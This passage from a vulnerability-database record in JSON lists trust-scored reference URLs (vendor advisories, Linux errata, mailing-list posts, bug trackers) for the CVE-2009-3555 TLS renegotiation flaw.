"url": "http://osvdb.org/60972"
},
{
"trust": 1.7,
"url": "http://osvdb.org/62210"
},
{
"trust": 1.7,
"url": "http://osvdb.org/65202"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3164"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3165"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3205"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3220"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3310"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3313"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3353"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3354"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3484"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3521"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2009/3587"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0086"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0173"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0748"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0848"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0916"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0933"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0982"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/0994"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1054"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1107"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1191"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1350"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1639"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1673"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/1793"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/2010"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/2745"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/3069"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/3086"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2010/3126"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0032"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0033"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2011/0086"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2010/jan/msg00000.html"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2010//may/msg00001.html"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2010//may/msg00002.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg01029.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg01020.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00645.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00944.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00428.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00442.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00449.html"
},
{
"trust": 1.7,
"url": "https://www.redhat.com/archives/fedora-package-announce/2009-december/msg00634.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-october/049702.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-october/049528.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-october/049455.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-april/039561.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-april/039957.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-may/040652.html"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-200912-01.xml"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-201203-22.xml"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-201406-32.xml"
},
{
"trust": 1.7,
"url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c02436041"
},
{
"trust": 1.7,
"url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02273751"
},
{
"trust": 1.7,
"url": "http://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02512995"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522176"
},
{
"trust": 1.7,
"url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01945686"
},
{
"trust": 1.7,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1ic67848"
},
{
"trust": 1.7,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1ic68054"
},
{
"trust": 1.7,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1ic68055"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:076"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:084"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:089"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-049"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0119.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0130.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0155.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0165.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0167.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0337.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0338.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0339.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0768.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0770.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0786.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0807.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0865.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0986.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2010-0987.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2011-0880.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00009.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00005.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-04/msg00001.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00002.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-10/msg00006.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00006.html"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00014.html"
},
{
"trust": 1.7,
"url": "http://www.us-cert.gov/cas/techalerts/ta10-222a.html"
},
{
"trust": 1.7,
"url": "http://www.us-cert.gov/cas/techalerts/ta10-287a.html"
},
{
"trust": 1.7,
"url": "http://www.ubuntu.com/usn/usn-1010-1"
},
{
"trust": 1.7,
"url": "http://ubuntu.com/usn/usn-923-1"
},
{
"trust": 1.7,
"url": "http://www.ubuntu.com/usn/usn-927-1"
},
{
"trust": 1.7,
"url": "http://www.ubuntu.com/usn/usn-927-4"
},
{
"trust": 1.7,
"url": "http://www.ubuntu.com/usn/usn-927-5"
},
{
"trust": 1.7,
"url": "http://openbsd.org/errata45.html#010_openssl"
},
{
"trust": 1.7,
"url": "http://openbsd.org/errata46.html#004_openssl"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2009/11/05/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2009/11/05/5"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2009/11/06/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2009/11/07/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2009/11/20/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2009/11/23/10"
},
{
"trust": 1.7,
"url": "https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.7,
"url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.7,
"url": "https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.7,
"url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220%40%3cdev.tomcat.apache.org%3e"
},
{
"trust": 1.7,
"url": "http://blog.g-sec.lu/2009/11/tls-sslv3-renegotiation-vulnerability.html"
},
{
"trust": 1.7,
"url": "http://clicky.me/tlsvuln"
},
{
"trust": 1.7,
"url": "http://extendedsubset.com/renegotiating_tls.pdf"
},
{
"trust": 1.7,
"url": "http://kbase.redhat.com/faq/docs/doc-20491"
},
{
"trust": 1.7,
"url": "http://support.apple.com/kb/ht4004"
},
{
"trust": 1.7,
"url": "http://support.apple.com/kb/ht4170"
},
{
"trust": 1.7,
"url": "http://support.apple.com/kb/ht4171"
},
{
"trust": 1.7,
"url": "http://support.avaya.com/css/p8/documents/100070150"
},
{
"trust": 1.7,
"url": "http://support.zeus.com/zws/news/2010/01/13/zws_4_3r5_released"
},
{
"trust": 1.7,
"url": "http://sysoev.ru/nginx/patch.cve-2009-3555.txt"
},
{
"trust": 1.7,
"url": "http://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html"
},
{
"trust": 1.7,
"url": "http://wiki.rpath.com/advisories:rpsa-2009-0155"
},
{
"trust": 1.7,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24006386"
},
{
"trust": 1.7,
"url": "http://www.betanews.com/article/1257452450"
},
{
"trust": 1.7,
"url": "http://www.openssl.org/news/secadv_20091111.txt"
},
{
"trust": 1.7,
"url": "http://www.opera.com/docs/changelogs/unix/1060/"
},
{
"trust": 1.7,
"url": "http://www.opera.com/support/search/view/944/"
},
{
"trust": 1.7,
"url": "http://www.tombom.co.uk/blog/?p=85"
},
{
"trust": 1.7,
"url": "http://xss.cx/examples/plesk-reports/plesk-parallels-controlpanel-psa.v.10.3.1_build1013110726.09%20os_redhat.el6-billing-system-plugin-javascript-injection-example-poc-report.html"
},
{
"trust": 1.7,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=526689"
},
{
"trust": 1.7,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=545755"
},
{
"trust": 1.7,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00013.html"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10088"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11578"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11617"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7315"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7478"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7973"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a8366"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a8535"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54158"
},
{
"trust": 1.6,
"url": "http://www-1.ibm.com/support/search.wss?rs=0\u0026q=pm00675\u0026apar=only"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=127557596201693\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=cryptography\u0026m=125752275331877\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=134254866602253\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=127419602507642\u0026w=2"
},
{
"trust": 1.6,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2009\u0026m=slackware-security.597446"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=132077688910227\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=127128920008563\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=126150535619567\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=133469267822771\u0026w=2"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=apache-httpd-announce\u0026m=125755783724966\u0026w=2"
},
{
"trust": 0.8,
"url": "http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00014.html"
},
{
"trust": 0.8,
"url": "http://cvs.openssl.org/chngview?cn=18790"
},
{
"trust": 0.8,
"url": "http://www.links.org/files/no-renegotiation-2.patch"
},
{
"trust": 0.8,
"url": "http://blog.zoller.lu/2009/11/new-sslv3-tls-vulnerability-mitm.html"
},
{
"trust": 0.6,
"url": "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_the_apache"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2009:1694"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2009:1580"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0119"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2011:0880"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2009:1579"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d@%3cdev.tomcat.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0440"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0338"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0339"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0337"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0155"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2009-3555"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d@%3cdev.tomcat.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0807"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0011"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0130"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0987"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0865"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0986"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2015:1591"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3cdev.tomcat.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0166"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0165"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0167"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0162"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0164"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0163"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3cdev.tomcat.apache.org%3e"
},
{
"trust": 0.6,
"url": "httpd-announce\u0026m=125755783724966\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.info/?l=apache-"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0786"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0408"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0768"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0770"
},
{
"trust": 0.6,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10939"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-160-01"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-have-been-identified-in-ibm-tivoli-netcool-omnibus-probe-for-network-node-manager-i-cve-2009-3555/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.2561/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2853"
},
{
"trust": 0.3,
"url": "mozilla"
},
{
"trust": 0.3,
"url": "http://www.innominate.com/data/downloads/manuals/releasenotes_mguard_615_en.pdf"
},
{
"trust": 0.3,
"url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2011-february/000107.html"
},
{
"trust": 0.3,
"url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2011-february/000111.html"
},
{
"trust": 0.3,
"url": "http://blog.pfsense.org/?p=531"
},
{
"trust": 0.3,
"url": "http://www.opera.com/support/kb/view/944/"
},
{
"trust": 0.3,
"url": "http://aix.software.ibm.com/aix/efixes/security/ssl_advisory.asc"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21410851"
},
{
"trust": 0.3,
"url": "http://www.openssl.org/news/changelog.html"
},
{
"trust": 0.3,
"url": "http://www.apache.org/dist/httpd/changes_2.2.15"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21390112"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2013/nov/att-119/esa-2013-077.txt"
},
{
"trust": 0.3,
"url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03263573"
},
{
"trust": 0.3,
"url": "http://www11.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02122104"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21420576"
},
{
"trust": 0.3,
"url": "http://www.ibm.com/developerworks/java/jdk/alerts/"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=nas258cbfcf0a5645af7862576710041f65e"
},
{
"trust": 0.3,
"url": "http://www.matrixssl.org/archives/cat_releases.html"
},
{
"trust": 0.3,
"url": "http://www.matrixssl.org/index.html"
},
{
"trust": 0.3,
"url": "http://www.ibm.com/support/docview.wss?uid=swg24006386"
},
{
"trust": 0.3,
"url": "http://msmvps.com/blogs/alunj/archive/2009/11/18/1740656.aspx"
},
{
"trust": 0.3,
"url": "https://developer.mozilla.org/nss_3.12.5_release_notes"
},
{
"trust": 0.3,
"url": "http://www.openbsd.org/errata45.html"
},
{
"trust": 0.3,
"url": "http://www.openbsd.org/errata46.html"
},
{
"trust": 0.3,
"url": "http://article.gmane.org/gmane.network.openvpn.devel/2835"
},
{
"trust": 0.3,
"url": "http://www.opera.com/docs/changelogs/windows/1050/"
},
{
"trust": 0.3,
"url": "http://my.opera.com/securitygroup/blog/2010/01/23/alpha-testing-tls-renego-fix"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1pk96157"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1pm10658"
},
{
"trust": 0.3,
"url": "http://www.ietf.org/mail-archive/web/tls/current/msg03942.html"
},
{
"trust": 0.3,
"url": "http://www.porcupine.org/postfix-mirror/smtp-renegotiate.pdf"
},
{
"trust": 0.3,
"url": "http://www.ssh.com/documents/33/sshtectiaguardian_2.0.2b_releasenotes.txt"
},
{
"trust": 0.3,
"url": "http://tools.ietf.org/html/rfc5746"
},
{
"trust": 0.3,
"url": "http://www.g-sec.lu/tls-ssl-proof-of-concept.html"
},
{
"trust": 0.3,
"url": "https://kb.bluecoat.com/index?page=content\u0026id=sa44\u0026actp=list"
},
{
"trust": 0.3,
"url": "http://www.innominate.com/data/downloads/manuals/releasenotes_mguard_516_en.pdf"
},
{
"trust": 0.3,
"url": "http://www.innominate.com/data/downloads/manuals/releasenotes_mguard_721_en.pdf"
},
{
"trust": 0.3,
"url": "http://lists.vmware.com/pipermail/security-announce/2010/000106.html"
},
{
"trust": 0.3,
"url": "/archive/1/510726"
},
{
"trust": 0.3,
"url": "/archive/1/508176"
},
{
"trust": 0.3,
"url": "/archive/1/508130"
},
{
"trust": 0.3,
"url": "/archive/1/507952"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/mar/84"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21415080"
},
{
"trust": 0.3,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-273350-1"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24025718"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24025719"
},
{
"trust": 0.3,
"url": "http://voodoo-circle.sourceforge.net/sa/sa-20091112-01.html"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100074555"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100071565"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100072446"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100077741"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100078357"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100080915"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100081602"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100082047"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100092059"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100107778"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100080668"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21607116"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml"
},
{
"trust": 0.3,
"url": "http://fortiguard.com/psirt/fg-ir-17-137"
},
{
"trust": 0.3,
"url": "http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03024266\u0026ac.admitted=1320706848406.876444892.492883150"
},
{
"trust": 0.3,
"url": "http://www11.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02512995\u0026admit=109447626+1284637282234+28353475"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888"
},
{
"trust": 0.3,
"url": "http://www13.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02616748\u0026admit=109447627+1291997777000+28353475"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1ic69118"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/technet/security/advisory/977377.mspx"
},
{
"trust": 0.3,
"url": "http://www.microsoft.com/technet/security/bulletin/ms10-049.mspx"
},
{
"trust": 0.3,
"url": "http://www.novell.com/support/viewcontent.do?externalid=7005950\u0026sliceid=1"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/javacpumar2010.html"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2010-0119.html"
},
{
"trust": 0.3,
"url": "https://kb.bluecoat.com/index?page=content\u0026id=sa61\u0026actp=list"
},
{
"trust": 0.3,
"url": "http://www.blackberry.com/btsc/dynamickc.do?externalid=kb25966\u0026sliceid=1\u0026command=show\u0026forward=nonthreadedkc\u0026kcid=kb25966"
},
{
"trust": 0.3,
"url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
},
{
"trust": 0.3,
"url": "http://h30046.www3.hp.com/subsignin.php"
},
{
"trust": 0.3,
"url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
},
{
"trust": 0.3,
"url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
},
{
"trust": 0.2,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3555"
},
{
"trust": 0.2,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0082"
},
{
"trust": 0.2,
"url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
},
{
"trust": 0.2,
"url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430"
},
{
"trust": 0.2,
"url": "https://www.hp.com/go/swa"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=132077688910227\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=142660345230545\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=127419602507642\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=134254866602253\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=130497311408250\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=133469267822771\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=126150535619567\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=127128920008563\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=127557596201693\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://www-1.ibm.com/support/search.wss?rs=0\u0026amp;q=pm00675\u0026amp;apar=only"
},
{
"trust": 0.1,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2009\u0026amp;m=slackware-security.597446"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=apache-httpd-announce\u0026amp;m=125755783724966\u0026amp;w=2"
},
{
"trust": 0.1,
